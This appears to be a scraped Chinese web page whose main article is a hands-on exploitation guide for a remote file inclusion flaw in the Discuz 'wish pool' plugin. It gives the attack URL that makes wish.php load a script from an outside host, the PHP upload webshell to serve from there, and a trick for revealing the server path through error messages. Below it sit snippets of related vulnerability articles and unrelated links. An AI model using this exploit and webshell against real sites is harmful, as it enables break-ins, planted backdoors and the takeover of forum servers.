discuz许愿池插件远程包含漏洞
许愿池插件的wish.php文件出的问题:
require $discuz_root.'./include/discuzcode.func.php';
手工利用方法:
远程包含漏洞,变量discuz_root过滤不严,利用方法:
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。
这里xxxx.txt用CN.Tink的那个小马写个shell进去:
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
网站物理路径可以通过提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看错误提示信息,然后修改xxxx.txt中的路径即可。 guizai.php就是你上传的shell的名字。
相关推荐
-
discuz许愿池插件远程包含漏洞
许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号. 这里xxxx.txt用CN.Tink的那个小马写个shell进去: <?copy
-
DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553)
一.漏洞描述 该漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖,以至于最后引起远程文件包含漏洞. 二.漏洞影响版本 DeDeCMS < 5.7-sp1,包括5.7 sp1版本 三.漏洞环境搭建 1.下载DeDeCMS V5.7 SP1,然后放到phpstudy环境下的www目录下,然后浏览器访http://192.168.10.171/dedecms/uploads/install/index.php 2.点击我已阅读并继
-
详解PHP渗透测试文件包含漏洞与利用
目录 什么是文件包含漏洞 文件包含漏洞的分类 本地文件包含 漏洞&利用 利用条件(以PHP为例) 直接访问文件 利用协议读取源代码 截断%00 长度截断 PHP的伪协议 file:// php:// data:// phar:// 远程文件包含 漏洞利用 远程包含webshell 代码审计 修复建议 什么是文件包含漏洞 文件包含,在网站开发人员开发网站时,会将经常重复的代码写道一个单独的文件中,在别的文件中可以使用文件包含的函数来引用单独的文件.目前很多语言都支持文件包含,例如php(inchu
-
php5系列的apache远程执行漏洞攻击脚本
php5.x系列/apache远程执行漏洞及攻击脚本以下为相关代码,请文明使用... 复制代码 代码如下: /* Apache Magica by Kingcope *//* gcc apache-magika.c -o apache-magika -lssl *//* This is a code execution bug in the combination of Apache and PHP.On debian and Ubuntu the vulnerability is presen
-
IDEA使用Docker插件远程部署项目到云服务器的方法步骤
1. 打开2375端口 编辑docker.service vim /lib/systemd/system/docker.service 在 ExecStart 后添加配置 -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock 重启docker网络和docker systemctl daemon-reload systemctl restart-docker Centos7 开放端口 firewall-cmd --zone=public --add
-
Tomcat使用线程池处理远程并发请求的方法
通过了解学习tomcat如何处理并发请求,了解到线程池,锁,队列,unsafe类,下面的主要代码来自 java-jre: sun.misc.Unsafe java.util.concurrent.ThreadPoolExecutor java.util.concurrent.ThreadPoolExecutor.Worker java.util.concurrent.locks.AbstractQueuedSynchronizer java.util.concurrent.locks.Abstr
-
Vscode的SSH插件远程连接Linux的实现步骤
最近在B站上看到Vscode可以远程连接Linux, 不仅有与linux一模一样的终端,而且写代码很舒服,所以尝试了一下远程连接. 首先,要先在Vscode中安装 “Remote-SSH”扩展(插件), 安装好之后,在工具栏会出现这个图标: 之后点击“+”,添加远程主机: 点击之后,会弹出一个框,要我们输入待连接的远程主机的用户名和IP地址:按格式输入,输入之后,回车键确认 如何查看Linux的IP地址: 方法一:进入Linux的设置(Setting) 方法二:在linux的终端输入一条指令 $
-
关于CVE-2020-1983:Tomcat 文件包含漏洞的问题
目录 一.靶场环境 1.漏洞:任意文件包含 2.影响版本 二.搭建环境 1.启动环境 2.访问 3.漏洞利用 4.修复建议 起序:漏扫完看报告的时候发现的,复现学习一下. 一.靶场环境 使用的是 github 上的 vulhub 环境.Tomcat 版本为 9.0.30. 1.漏洞:任意文件包含 攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件.源代码等. 2.影响版本 Apache Tomcat 9.x < 9.0.31 Apach
-
Java动态线程池插件dynamic-tp集成zookeeper
目录 前言 配置刷新 Zookeeper配置中心接入扩展实现 总结 前言 dynamic-tp是一个轻量级的动态线程池插件,它是一个基于配置中心的动态线程池,线程池的参数可以通过配置中心配置进行动态的修改,在配置中心的支持上最开始的时候支持Nacos和Apollo,由于笔者公司用的配置中心是Zookeeper,所以就想着扩展支持Zookeeper,在了解源码支持发现dynamic-tp的扩展能力做的很好,提供了扩展接口,只要我开发对应的配置中心模块即可,最终笔者实现了Zookeeper的支持并贡
-
PHP 网络开发详解之远程文件包含漏洞
以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能. 复制代码 代码如下: <?php $file_name = $_GET["filename"]; //获得当前文件名 include("$file_name "); //包含文件 //一些其他操作 ?> 这时,通过在地址栏上指定不同的文件名就可以实现包含不同文件并执行的功能.例如,通过在浏览器上访问http://localhost/test.php?filename=myinc
随机推荐
- swift学习文档(笔记)
- 在Python中操作时间之mktime()方法的使用教程
- js中cookie的使用详细分析
- 加密你的Access数据库asp打开方法
- 详谈Angular路由与Nodejs路由的区别
- 基于Android 监听ContentProvider 中数据变化的相关介绍
- C++学生信息管理系统
- UDDI FAQs
- C++基于栈实现铁轨问题
- Mysql全局ID生成方法
- 七夕情人节丘比特射箭小游戏
- JavaScript/jQuery、HTML、CSS 构建 Web IM 远程及时聊天通信程序
- Linux下的代理服务器设置
- 详解linux后台运行和关闭、查看后台任务
- Android组件之DrawerLayout实现抽屉菜单
- Dwr3.0纯注解(纯Java Code配置)配置与应用浅析三之后端反向调用前端
- 简要对比C语言中的setgid()函数和setregid()函数
- 配置OSPF非纯 Stub 区域NSSA
- PHP实现加密文本文件并限制特定页面的存取的效果
- spirngmvc js传递复杂json参数到controller的实例